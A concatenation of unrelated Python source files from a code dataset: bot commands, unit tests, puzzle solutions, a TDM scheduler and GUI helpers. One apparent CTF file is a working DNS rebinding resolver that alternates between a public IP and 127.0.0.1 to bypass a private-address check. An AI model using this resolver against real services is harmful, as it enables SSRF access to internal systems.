ctx.send(f'Check your email associated with the github account: {github_username}')\n except AssertionError:\n await ctx.send(f'Could not find the github account with the username of: {github_username}')\n\n @checks.admin_or_permissions()\n @commands.command()\n async def cloneTestRepo(self, ctx: Context, github_repo_url: str):\n if not github_repo_url:\n await ctx.send_help()\n if 'github.com/ACM-CBU/' in github_repo_url and len(github_repo_url.split('/')) > 4:\n sub_name = github_repo_url.split('/')[-1]\n new_sub = self.PARENT_REPO.create_submodule(name=sub_name, path=str(self.TEST_REPO_DIR.joinpath(sub_name)),\n url=github_repo_url)\n new_sub.set_parent_commit(None)\n await ctx.send(f\"added submodule {new_sub.name}\")\n # self.PARENT_REPO.git.commit(message=f\"Added new Submodule: {sub_name}\")\n # self.PARENT_REPO.git.push()\n\n else:\n await ctx.send(\"The repository must be within the ACM GitHub Organization\")\n\n @checks.admin_or_permissions()\n @commands.command()\n async def updateSubmodule(self, ctx: Context, submodule_name):\n if not submodule_name:\n await ctx.send_help()\n try:\n submodule = self.PARENT_REPO.submodule(name=submodule_name)\n sub_repo = submodule.module()\n await ctx.send(sub_repo.git.pull())\n except:\n await ctx.send(f\"Could not find submodule: {submodule_name}\")\n\n @checks.admin_or_permissions()\n @commands.command()\n async def deleteSubmodule(self, ctx: Context, submodule_name):\n if not submodule_name:\n await ctx.send_help()\n try:\n submodule = self.PARENT_REPO.submodule(name=submodule_name)\n submodule.remove()\n await ctx.send(f'Deleted submodule: {submodule_name}')\n except:\n await ctx.send(f\"Could not find submodule: {submodule_name}\")\n","sub_path":"cogs/CogManager/cogs/github/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"283193917","text":"\"\"\"\n@brief test log(time=140s)\n\nYou should indicate a time in seconds. The program ``run_unittests.py``\nwill sort all test files by increasing time and run them.\n\"\"\"\n\n\nimport sys\nimport os\nimport unittest\n\n\ntry:\n import src\n import pyquickhelper as skip_\nexcept ImportError:\n path = os.path.normpath(\n os.path.abspath(\n os.path.join(\n os.path.split(__file__)[0],\n \"..\",\n \"..\")))\n if path not in sys.path:\n sys.path.append(path)\n path = os.path.normpath(\n os.path.abspath(\n os.path.join(\n os.path.split(__file__)[0],\n \"..\",\n \"..\",\n \"..\",\n \"pyquickhelper\",\n \"src\")))\n if path not in sys.path:\n sys.path.append(path)\n import src\n import pyquickhelper as skip_\n\nfrom pyquickhelper.loghelper import fLOG\nfrom src.pyensae.remote.magic_azure import MagicAzure\n\nthisfold = os.path.abspath(os.path.split(__file__)[0])\nthiscomm = os.path.join(thisfold, \"..\")\nsys.path.append(thiscomm)\n\n\nclass MockObject:\n pass\n\n\nclass TestMagicAzure(unittest.TestCase):\n\n def test_blob_path(self):\n fLOG(\n __file__,\n self._testMethodName,\n OutputPrint=__name__ == \"__main__\")\n\n mg = MagicAzure()\n mg.shell = MockObject()\n mg.shell.user_ns = {\"remote_azure_client\": MockObject(),\n \"remote_azure_blob\": MockObject()}\n mg.shell.user_ns[\"remote_azure_client\"].account_name = \"ACC\"\n cmd = \"/part1/part2\"\n fLOG(\"**\", cmd)\n res = mg.blob_path(cmd)\n fLOG(res)\n self.assertEqual(res, ('ACC', 'part1/part2'))\n res = mg.blob_path(\"part1/part2\")\n fLOG(res)\n self.assertEqual(res, ('part1', 'part2'))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"_unittests/ut_remote/test_magic_azure.py","file_name":"test_magic_azure.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"556626849","text":"from fileinput import input\nfrom collections import defaultdict\nfrom string import ascii_uppercase\nfrom copy import deepcopy\n\nlines = [i.rstrip() for i in input()]\ntuples = [(i[5], i[36]) for i in lines]\n\nx = defaultdict(list)\nfor t in tuples:\n x[t[1]].append(t[0])\n [x[s] for s in t[0]]\n#print(x)\n\ndef findFirstEmpty(dct):\n for s in dct.keys():\n if dct[s] == []:\n return s\n return \"\"\n\nbackup = dict(x)\n\norder = []\nwhile len(order) < 26:\n key = findFirstEmpty(x)\n order.append(key)\n for s in x.keys():\n x[s] = [i for i in x[s] if i != key]\n del x[key]\n\n\n\n#print(\"\".join(order))\n#print((x))\n\n##Part2\n\n\n\nprint(backup)\ndone = set()\nworkers = [(\"\", 0)] * 5\n\ndef findFirstEmptyBis(dct):\n for s in dct.keys():\n if dct[s] == [] and s not in getInProgress(workers):\n return s\n return \"\"\n\ndef removeFromDict(letter, dct):\n for x in dct.keys():\n dct[x] = [i for i in dct[x] if i != letter]\n del dct[letter]\n\ndef getInProgress(wrk):\n return {i[0] for i in workers}\n\ndef getSeconds(letter):\n if letter == \"\":\n return 0\n return 61 + (ord(letter) - ord('A'))\n\n\ncounter = -1\nwhile len(done) < 27:\n #print(workers)\n counter += 1\n workers = [(l, t-1) for l,t in workers]\n for i,w in enumerate(workers):\n if w[1] <= 0:\n done.add(w[0])\n if w[0] in backup:\n removeFromDict(w[0], backup)\n nxtletter = findFirstEmptyBis(backup)\n workers[i] = (nxtletter, getSeconds(nxtletter))\n \nprint(counter)","sub_path":"day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"504100352","text":"\"\"\"Tests for the Cast config flow.\"\"\"\n\nfrom homeassistant import config_entries, data_entry_flow\nfrom homeassistant.components import cast\nfrom homeassistant.setup import async_setup_component\n\nfrom tests.async_mock import patch\n\n\nasync def test_creating_entry_sets_up_media_player(hass):\n \"\"\"Test setting up Cast loads the media player.\"\"\"\n with patch(\n \"homeassistant.components.cast.media_player.async_setup_entry\",\n return_value=True,\n ) as mock_setup, patch(\n \"pychromecast.discovery.discover_chromecasts\", return_value=(True, None)\n ), patch(\n \"pychromecast.discovery.stop_discovery\"\n ):\n result = await hass.config_entries.flow.async_init(\n cast.DOMAIN, context={\"source\": config_entries.SOURCE_USER}\n )\n\n # Confirmation form\n assert result[\"type\"] == data_entry_flow.RESULT_TYPE_FORM\n\n result = await hass.config_entries.flow.async_configure(result[\"flow_id\"], {})\n assert result[\"type\"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY\n\n await hass.async_block_till_done()\n\n assert len(mock_setup.mock_calls) == 1\n\n\nasync def test_configuring_cast_creates_entry(hass):\n \"\"\"Test that specifying config will create an entry.\"\"\"\n with patch(\n \"homeassistant.components.cast.async_setup_entry\", return_value=True\n ) as mock_setup:\n await async_setup_component(\n hass, cast.DOMAIN, {\"cast\": {\"some_config\": \"to_trigger_import\"}}\n )\n await hass.async_block_till_done()\n\n assert len(mock_setup.mock_calls) == 1\n\n\nasync def test_not_configuring_cast_not_creates_entry(hass):\n \"\"\"Test that no config will not create an entry.\"\"\"\n with patch(\n \"homeassistant.components.cast.async_setup_entry\", return_value=True\n ) as mock_setup:\n await async_setup_component(hass, cast.DOMAIN, {})\n await hass.async_block_till_done()\n\n assert len(mock_setup.mock_calls) == 0\n","sub_path":"tests/components/cast/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"581462236","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: erigara\n\nModule provide preprocessing functions\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom database.rating_data import RatingData\n\ndef groupsize_filter(rating_data, by, min_groupsize=0):\n \"\"\"\n Remove rows with id_column such that it has < min_groupzize rows in dataframe\n \n rating_data : RatingData\n \n by : str\n name of groupby column\n \n min_groupsize : int\n smallest possible groupsize that stay in dataframe\n \"\"\"\n df_cnt = pd.DataFrame(\n rating_data.df.groupby(by).size(),\n columns=['count'])\n ids = list(pd.unique(df_cnt.query('count >= @min_groupsize').index))\n filtred_df = rating_data.df.query(by+' in @ids')\n return RatingData(filtred_df, *rating_data[1:])\n\ndef get_train_test_split(rating_data, by, train_coeff = 0.8):\n \"\"\"\n Spliting dataframe into two datarames with fixed size. All data sorted by time and each\n train samle contain the same portion of each user's data\n\n df: pd.DataFrame\n dataframe needed to be split\n\n by: str\n name of ids column\n\n train_coeff: int\n coefficient of train sample size\n\n return:\n train, test: pd.DataFrame\n dataframes which split by time. test dataframe contains elder user's ratings\n \"\"\"\n cur_df = rating_data.df.copy()\n cur_df.sort_values(by=[by, rating_data.timestamp_col_name], inplace=True)\n sizes = list(rating_data.df.groupby(by).size())\n train_sizes = [round(train_coeff * size) for size in sizes]\n train_indexer = np.array([True for i in range(sum(sizes))])\n # fill with False last (1-train_coeff) rows for every user_id\n current_size = 0\n for i in range(len(train_sizes)):\n train_indexer[current_size + train_sizes[i] : current_size + sizes[i]] = False\n current_size += sizes[i]\n test_indexer = ~train_indexer\n train_df, test_df = cur_df[train_indexer], cur_df[test_indexer]\n \n \n return RatingData(train_df, *rating_data[1:]), RatingData(test_df, *rating_data[1:])\n\n","sub_path":"utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"291955662","text":"#!/bin/env python\n# -*- coding: utf-8 -*-\n# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python\n#======================================================================\n#\n# Copyright (c) 2017 Baidu.com, Inc. All Rights Reserved\n#\n#======================================================================\n\"\"\"\n/***************************************************************************\n *\n * Copyright (c) 2019 Baidu.com, Inc. All Rights Reserved\n * @file test_dist_fleet_utils_cloud_client.py\n * @author liyang109@baidu.com\n * @date 2021-01-20 19:57\n * @brief \n *\n **************************************************************************/\n\"\"\"\nimport os\nimport sys\nimport subprocess\nfrom utils import run_priority\n\n\nclass TestFleetUtilsAfsApi():\n \"\"\"TestFleetUtilsAfsApi\"\"\"\n def test_dist_fleet_utils_hdfs_client(self):\n \"\"\"test_dist_fleet_worker\"\"\"\n cmd = 'fleetrun dist_fleet_utils_hdfs_client.py'\n pro = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = pro.communicate()\n print(out)\n pro.wait()\n pro.returncode == 0\n\n def test_dist_fleet_utils_local_client(self):\n \"\"\"test_dist_fleet_utils_local_client\"\"\"\n cmd = 'fleetrun dist_fleet_utils_localfs.py'\n pro = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = pro.communicate()\n print(out)\n pro.wait()\n pro.returncode == 0","sub_path":"dist_cts/dist_fleet_2.0/test_dist_fleet_utils_cloud_client.py","file_name":"test_dist_fleet_utils_cloud_client.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"508592039","text":"import numpy as np\nfrom timeit import default_timer as timer\n\nfilenames = ['1', '2', '3', '4']\nLOOPS = 5000\n\n# ====================\n# === INPUT PARSER ===\n# ====================\nfor filename in filenames:\n start = timer()\n services, countries, tabella, progetti = [[], [], [], []]\n with open(\"in/{}.in\".format(filename)) as f:\n # V = providers, S = services, C = countries, P = projects\n V, S, C, P = map(int, f.readline().split())\n services = f.readline().split()\n countries = f.readline().split()\n # Read providers\n for i in range(V):\n name, number = f.readline().split()\n for j in range(int(number)):\n f.readline()\n tabella.append([i] + [j] + list(map(lambda x: float(x), f.readline().split())) + list(map(lambda x: float(x), f.readline().split())))\n # Read projects\n idProg = 0\n for p in range(P):\n line = list(f.readline().split())\n line[0] = int(line[0])\n line[1] = countries.index(line[1])\n line[2:] = [int(l) for l in line[2:]]\n progetti.append([idProg] + line)\n idProg += 1\n tabella = np.asarray(tabella)\n progetti = np.asarray(progetti)\n \n \n # ===================\n # === CALCULATION ===\n # ===================\n output = []\n for p in progetti:\n units_needed = p[3:] # Units needed for project p\n units_allocated = np.zeros(S) # Units allocated to project p\n tempOUT = []\n \n loop = True\n tBackup = tabella.copy()\n count = 0 # number of times looped\n \n while loop and count < LOOPS and tabella.size > 0:\n loop = False\n \n diff = units_needed - units_allocated\n if any(diff > 0):\n indexU = np.argmax(diff)\n \n col = tabella[:, 4+indexU]\n indexMax = np.argmax(col) \n \n tempOUT.append(\"{} {}\".format(int(tabella[indexMax, 0]), int(tabella[indexMax, 1])))\n # Assign the units to the project\n units_allocated += tabella[indexMax, 4:4+S]\n # Decrease the number of packages available for the provider\n tabella[indexMax, 2] -= 1\n \n if tabella[indexMax, 2] == 0: tabella = np.delete(tabella, indexMax, 0)\n if tabella.size == 0: break\n \n # If there is at least one unit not satisfied reloop\n if any(units_allocated < units_needed): \n loop = True\n count += 1\n \n output.append(tempOUT)\n del tempOUT\n \n output = [sorted(o) for o in output]\n print(\"Calc for {} done.\".format(filename))\n \n \n # ==============\n # === OUTPUT ===\n # ==============\n with open(\"out/{}.out\".format(filename), 'w') as f:\n for o1 in output:\n checked = []\n for o2 in o1:\n if o2 not in checked:\n tot = o1.count(o2)\n checked.append(o2)\n f.write(\"{} {} \".format(o2, tot))\n f.write(\"\\n\")\n print(\"End file {} in {}\".format(filename, timer()-start))\n","sub_path":"2018/mainSB_v2.py","file_name":"mainSB_v2.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"384004826","text":"\"\"\"\nFaça um programa que leia um ano qualquer e mostre\nse ele é BISSEXTO\n\"\"\"\n\nfrom datetime import date\n\nano = int(input('Digite o ano a ser avaliado (Digite zero para o atual):\\n'))\n\nif ano == 0:\n ano = date.today().year\n\nif ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:\n print(f'O ano {ano} é bissexto!')\nelse:\n print(f'O ano {ano} NÃO é bissexto!')\n\n\n\n'''checa = ano % 4\nif ano < 100:\n print('Ano bissexto!' if checa == 0 else 'Ano não bissexto.')\nelse:\n if checa != 0:\n print('Ano não bissexto.')\n else:\n if ano % 100 != 0:\n print('Ano bissexto!')\n else:\n if ano % 400 == 0:\n print('Ano bissexto!')\n else:\n print('Ano não bissexto.')'''","sub_path":"Exercicios_resolvidos/10. Condições - ex032 - Ano bissexto.py","file_name":"10. Condições - ex032 - Ano bissexto.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"110353511","text":"#Problema: 12279 - Emoogle Balance\n#Autor: FernandoJerezano\n#Fecha: 28-Octubre-2017\nimport string\n\nc = 1\n\nwhile True:\n\tt = int(input())\n\tif t==0:\n\t\tbreak;\n\tval = input().split(\" \")\n\t\n\tm = 0\n\tn = 0\n\t\n\tfor v in val:\n\t\tif int(v)==0:\n\t\t\tm += 1\n\t\telse:\n\t\t\tn += 1\n\t\t\t\n\tprint(\"Case %d:\" % c,n-m)\n\tc += 1\n","sub_path":"12279 - Emoogle Balance.py","file_name":"12279 - Emoogle Balance.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"322360481","text":"from operator import itemgetter, attrgetter\nfrom math import ceil\n\nclass Tdm():\n\n def __init__(self,total_bw):\n self.total_bw = total_bw\n\n def gen_calendar(self, bw, minGraun=1):\n \"\"\"按照端口带宽列表bw和Calendar配置最小粒度minGraun生成Calendar配置表\n\n Arguments:\n bw {[number]} -- 端口带宽列表\n \n Keyword Arguments:\n minGraun {int} -- 端口带宽的最小换算单位 (default: {1})\n \n Returns:\n [int] -- 返回calendar表结果。每个元素代表当前slot选择的端口序号,-1代表当前slot没有选择。\n\n Priniciple:\n 1. 计算每个端口的希望slot间隔;\n 2. 按端口设置interval,记录距下次填充的间隔slot。填充一个slot后,所有端口的interval都减1;\n 3. 当interval<=0后,再次填充该端口\n \"\"\"\n\n\n class TdmCalendarPortAttribute():\n \"\"\"定义内部使用的数据类\n \"\"\"\n\n def __init__(self,id,bw,total_bw,min_granu):\n # 属性\n self.id = id # 端口编号\n self.bw = ceil(bw/min_granu) # 端口带宽\n self.step = total_bw / bw # 端口调度最大间隔。支持step为非整数\n # 状态\n self.start = False # 端口Calendar填表是否开始表示\n self.interval = 0 # 据上次调度的间隔\n # 统计\n self.expect_slot_st = False # Jitter开始标识\n self.expect_slot = 0 # 当前选择期望的被选中slot。start=True后有效\n self.max_jitter = 0 # 最终的最大jitter记录\n \n def is_unstart(self):\n return not self.start\n\n def is_timeout(self):\n return self.start and self.interval <= 0\n\n def selected(self, slot):\n \"\"\"选中该端口,更新内部数据,并返回id\n \"\"\"\n # Reload端口调度间隔。interval初始为0,第一次start从False变为True后,也需要Reload\n self.interval += self.step\n\n # 更新最大等待Jitter值(DFx)。第一次更新时,初始值都为0\n if self.start and self.expect_slot_st:\n self.max_jitter = max( self.max_jitter, ( slot - self.expect_slot ) )\n if not self.step.is_integer():\n self.max_jitter += 1\n self.expect_slot_st = False\n\n # 无论是否已经开始选择,都更新开始表示\n self.start = True\n\n return self.id\n\n def update(self,slot):\n \"\"\"更新当前端口信息。每次Calendar选择都刷新\n \n Arguments:\n slot {int} -- 当前选择时隙\n \"\"\"\n\n \n if self.start == True:\n self.interval -= 1 # 开始选择端口的调度间距都减1\n\n if self.interval <= 0: # 间隔到期,但没有被选中\n self.expect_slot = slot\n self.expect_slot_st = True\n\n\n def shorten(calendar):\n \"\"\"删减重复的表项,缩减表项长度\n \n Arguments:\n calendar {[int]} -- calendar配置表\n \"\"\"\n\n l = len(calendar)\n\n if l == 0 or l % 2 == 1: #长度不对称,无法化简\n return calendar\n\n lsb = calendar[:int(l/2)]\n msb = calendar[int(l/2):]\n\n # 判断对应位置是否完全相同\n is_all_same = all(map(lambda l,m : l==m, lsb, msb))\n\n if is_all_same:\n return shorten(lsb) # 完全相同,化简后继续迭代化简\n else: # 不完全相同,无法化简\n return calendar\n\n\n rst = []\n\n # 创建端口属性\n # bw = map(lambda b,i: TdmCalendarPortAttribute(i,b,self.total_bw,minGraun), bw, range(len(bw)))\n bw = [TdmCalendarPortAttribute(i, bw[i], self.total_bw, minGraun) for i in range(len(bw))]\n # 按端口带宽从大到小排序\n bw = sorted(bw, key=attrgetter('bw'), reverse=True)\n\n # 循环填充Calendar格子\n for slot in range(ceil(self.total_bw / minGraun)):\n # 在开始填充的端口中查找填充间隔到期(interval<=0)的端口\n expect_port_it = filter(lambda port: port.is_timeout(), bw)\n\n try:\n expect_port = next(expect_port_it) # 使用简单的大端口优先(SP)方式在间隔都到达的端口之间选择\n rst.append(expect_port.selected(slot)) # 填充当前格子\n\n except StopIteration: # 没有到期的端口\n # 查找是否还有没有开始填充的端口\n unstart_port_it = filter(lambda port : port.is_unstart(), bw)\n\n try:\n # 按带宽从大到小开始填充\n expect_port = next(unstart_port_it)\n rst.append(expect_port.selected(slot))\n except StopIteration:\n rst.append(-1) # 当前时隙没有端口选择\n\n # 更新端口间隔\n for port in bw:\n port.update(slot)\n \n return shorten(rst) #返回最终的Calendar表\n \n# Test\ntdm = Tdm(800)\n\nprint( tdm.gen_calendar([100,100], 100) )\n# [0, 1, -1, -1, -1, -1, -1, -1]\n\nprint( tdm.gen_calendar([100,100,100], 50) ) \n# [0, 1, 2, -1, -1, -1, -1, -1]\n\nprint( tdm.gen_calendar([50,100,200,400], 50) ) \n# [3, 2, 3, 1, 3, 2, 3, 0, 3, 2, 3, 1, 3, 2, 3, -1]\n\nprint( tdm.gen_calendar([35], 5) ) ","sub_path":"bwMgr/python/tdm.py","file_name":"tdm.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"538658494","text":"\r\nclass Controller:\r\n def __init__(self, model):\r\n self.model = model\r\n\r\n def guess(self, character):\r\n # change uppercase to lowercase\r\n character.lower()\r\n\r\n # User Input Error\r\n if len(character) == 0:\r\n return \"Input one alphabet!\"\r\n\r\n if not character.isalpha():\r\n return \"Input only alphabet!\"\r\n\r\n if character in self.model.getGuessedChars():\r\n return \"Already use!\"\r\n\r\n # append character to guessedChars\r\n if character not in self.model.getGuessedChars():\r\n self.model.guessedChars.append(character)\r\n\r\n # User Wrong\r\n if character not in self.model.getAnswer():\r\n self.model.increaseTries()\r\n self.model.decreaseLife()\r\n return False\r\n #User Right\r\n # Update currentStatus\r\n else:\r\n self.model.updateStatus(character)\r\n return True\r\n","sub_path":"gui_controller.py","file_name":"gui_controller.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"552772362","text":"from PyQt5 import QtWidgets\n\n\nclass ClssDialog(QtWidgets.QDialog):\n def __init__(self, parent=None, text_error=\"\"):\n super(ClssDialog, self).__init__(parent)\n\n self.verticalLayout = QtWidgets.QVBoxLayout(self)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.label_text = QtWidgets.QLabel(self)\n self.label_text.setObjectName(\"label_text\")\n self.verticalLayout.addWidget(self.label_text)\n self.pushButton = QtWidgets.QPushButton(self)\n self.pushButton.setObjectName(\"pushButton\")\n self.pushButton.clicked.connect(self.btnClosed)\n self.verticalLayout.addWidget(self.pushButton)\n self.setWindowTitle(\"Сообщение об ошибке\")\n self.pushButton.setText(\"ОК\")\n self.label_text.setText(text_error)\n\n def btnClosed(self):\n self.close()\n","sub_path":"ErrorWindow.py","file_name":"ErrorWindow.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"611413431","text":"from twisted.internet import reactor, defer\nfrom twisted.names import client, dns, error, server\n\n\n\nclass DynamicResolver(object):\n resolve_cnt = 0\n def _doDynamicResponse(self, query):\n \"\"\"\n Calculate the response to a query.\n \"\"\"\n if self.resolve_cnt % 2 == 0:\n answer = dns.RRHeader(name=query.name.name,\n payload=dns.Record_A(address=b'93.184.216.34'),\n ttl=0)\n answers = [answer]\n authority = []\n additional = []\n else:\n answer = dns.RRHeader(name=query.name.name,\n payload=dns.Record_A(address=b'127.0.0.1'),\n ttl=0)\n answers = [answer]\n authority = []\n additional = []\n self.resolve_cnt += 1\n return answers, authority, additional\n\n def query(self, query, timeout=None):\n return defer.succeed(self._doDynamicResponse(query))\n\n\n\ndef main():\n \"\"\"\n Run the server.\n \"\"\"\n factory = server.DNSServerFactory(\n clients=[DynamicResolver(), client.Resolver(resolv='/etc/resolv.conf')]\n )\n\n protocol = dns.DNSDatagramProtocol(controller=factory)\n\n reactor.listenUDP(53, protocol)\n reactor.listenTCP(53, factory)\n\n reactor.run()\n\n\n\nif __name__ == '__main__':\n raise SystemExit(main())\n","sub_path":"twctf2020/urlcheck2/resolver/bypass_private_check_resolver.py","file_name":"bypass_private_check_resolver.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"425613322","text":"import numpy as np\n\nfrom keras.models import Model\nfrom keras.layers import Input, BatchNormalization, Concatenate, PReLU\nfrom keras.layers import Conv3D, MaxPooling3D, Conv3DTranspose\nfrom keras.utils import plot_model\n\n\ndef Encoding(inputs, filters=64, blocks=4):\n outputs = []\n x = inputs\n for index in range(blocks):\n x = Conv3D(filters * np.power(2, index), kernel_size=(3, 3, 3), strides=1, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = PReLU()(x)\n\n x = Conv3D(filters * np.power(2, index), kernel_size=(3, 3, 3), strides=1, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = PReLU()(x)\n\n if index != blocks - 1:\n outputs.append(x)\n x = MaxPooling3D(pool_size=(2, 2, 1))(x)\n\n return x, outputs\n\n\ndef Decoding_Deep_Supervision(inputs_1, inputs_2, filters=64, blocks=4, channel=3):\n x = inputs_1\n output_list = []\n for index in np.arange(blocks - 2, -1, -1):\n x = Conv3DTranspose(filters * np.power(2, index), kernel_size=(2, 2, 1), strides=(2, 2, 1), padding='same')(x)\n x = Concatenate(axis=4)([x, inputs_2[index]])\n\n x = Conv3D(filters * np.power(2, index), kernel_size=(3, 3, 3), strides=1, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = PReLU()(x)\n\n x = Conv3D(filters * np.power(2, index), kernel_size=(3, 3, 3), strides=1, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = PReLU()(x)\n\n output = Conv3D(channel, (1, 1, 1), activation='softmax')(x)\n output_list.append(output)\n\n output_list.reverse()\n\n return output_list\n\n\ndef DSUNet(input_shape, filters=64, blocks=4):\n inputs = Input(input_shape)\n\n x1, EncodingList = Encoding(inputs, filters, blocks)\n\n x2 = Decoding_Deep_Supervision(x1, EncodingList, filters, blocks)\n\n model = Model(inputs, x2)\n return model\n\n\nif __name__ == '__main__':\n model = DSUNet(input_shape=(240, 240, 3, 1), filters=64, blocks=4)\n model.summary()\n plot_model(model, to_file=r'C:\\Users\\ZhangYihong\\Desktop\\model.png', show_shapes=True, )\n","sub_path":"MyModel/3DModel.py","file_name":"3DModel.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"572954286","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\n决策树\n\n分类:\n1. 分类树,输出是样本的类标\n2. 回归树,输出是一个实数\n\n优点:\n1. 计算复杂度不高,输出结果易于理解\n2. 对中间值缺失不敏感,可以处理不相关的特征数据\n3. 使用数值型和标称型数据类型\n\n缺点:\n1. 可能会产生过度匹配\n\n决策树的一般流程:\n1. 收集数据\n2. 准备数据,只适用标称数据,因此要将数值离散化处理\n3. 分析数据,构造数完成之后,检查图形是否符合预期\n4. 训练算法,即构造数的数据结构\n5. 测试算法,使用经验数计算错误率\n6. 使用算法\n\"\"\"\nfrom math import log\n\n\ndef cal_shannon_ent(data_set):\n \"\"\"\n 计算香农熵\n H = -sum(p(Xi)log(p(Xi)))\n \"\"\"\n data_set_size = len(data_set)\n label_counts = {}\n for feat_vec in data_set:\n current_label = feat_vec[-1] # 数据字典,其键值为最后一列数值\n if current_label not in label_counts.keys():\n label_counts[current_label] = 0 + 1\n shannon_ent = 0.0\n for key in label_counts:\n prob = float(label_counts[key]) / data_set_size\n shannon_ent -= prob * log(prob, 2)\n return shannon_ent\n\n\ndef main():\n data_set = [[0], [2], [3]]\n ret = cal_shannon_ent(data_set)\n print(ret)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"algorithms/aiAlgorithms/decision_tree/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"173790089","text":"\"\"\"\nLicensed under MIT\nCopyright (c) 2013 Isaac Muse \nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nimport codecs\nimport json\nimport sys\nfrom os import mkdir, listdir\nfrom os.path import expanduser, exists, join, getmtime, isdir\nimport traceback\n\nfrom _lib.file_strip.json import sanitize_json\nimport _lib.notify as notify\nimport _lib.localization as localization\nfrom _lib.localization import get as _\n\nfrom _gui.custom_app import debug, debug_struct, error\nfrom _gui.custom_app import init_app_log, set_debug_mode\nfrom _gui.generic_dialogs import *\n\nfrom _icons.rum_ico import rum_64, rum_tray\n\nif sys.platform.startswith('win'):\n _PLATFORM = \"windows\"\nelif sys.platform == \"darwin\":\n _PLATFORM = \"osx\"\nelse:\n _PLATFORM = \"linux\"\n\nSETTINGS_FILE = \"rummage.settings\"\nCACHE_FILE = \"rummage.cache\"\nLOG_FILE = \"rummage.log\"\nFIFO = \"rummage.fifo\"\n\nNOTIFY_STYLES = {\n \"osx\": [\"growl\"],\n \"windows\": [\"native\", \"growl\"],\n \"linux\": [\"native\"]\n}\n\n\nclass Settings(object):\n filename = None\n allow_save = True\n\n @classmethod\n def load_settings(cls):\n \"\"\"\n Load the settings\n \"\"\"\n\n cls.settings_file, cls.cache_file, log = cls.get_settings_files()\n init_app_log(log)\n cls.settings = {}\n cls.cache = {}\n cls.settings_time = None\n cls.cache_time = None\n cls.get_times()\n if cls.settings_file is not None:\n try:\n with codecs.open(cls.settings_file, \"r\", encoding=\"utf-8\") as f:\n cls.settings = json.loads(sanitize_json(f.read(), preserve_lines=True))\n with codecs.open(cls.cache_file, \"r\", encoding=\"utf-8\") as f:\n cls.cache = json.loads(sanitize_json(f.read(), preserve_lines=True))\n except:\n e = traceback.format_exc()\n try:\n errormsg(_(\"Failed to load settings file!\"))\n error(e)\n except:\n print(str(e))\n if cls.get_debug():\n set_debug_mode(True)\n 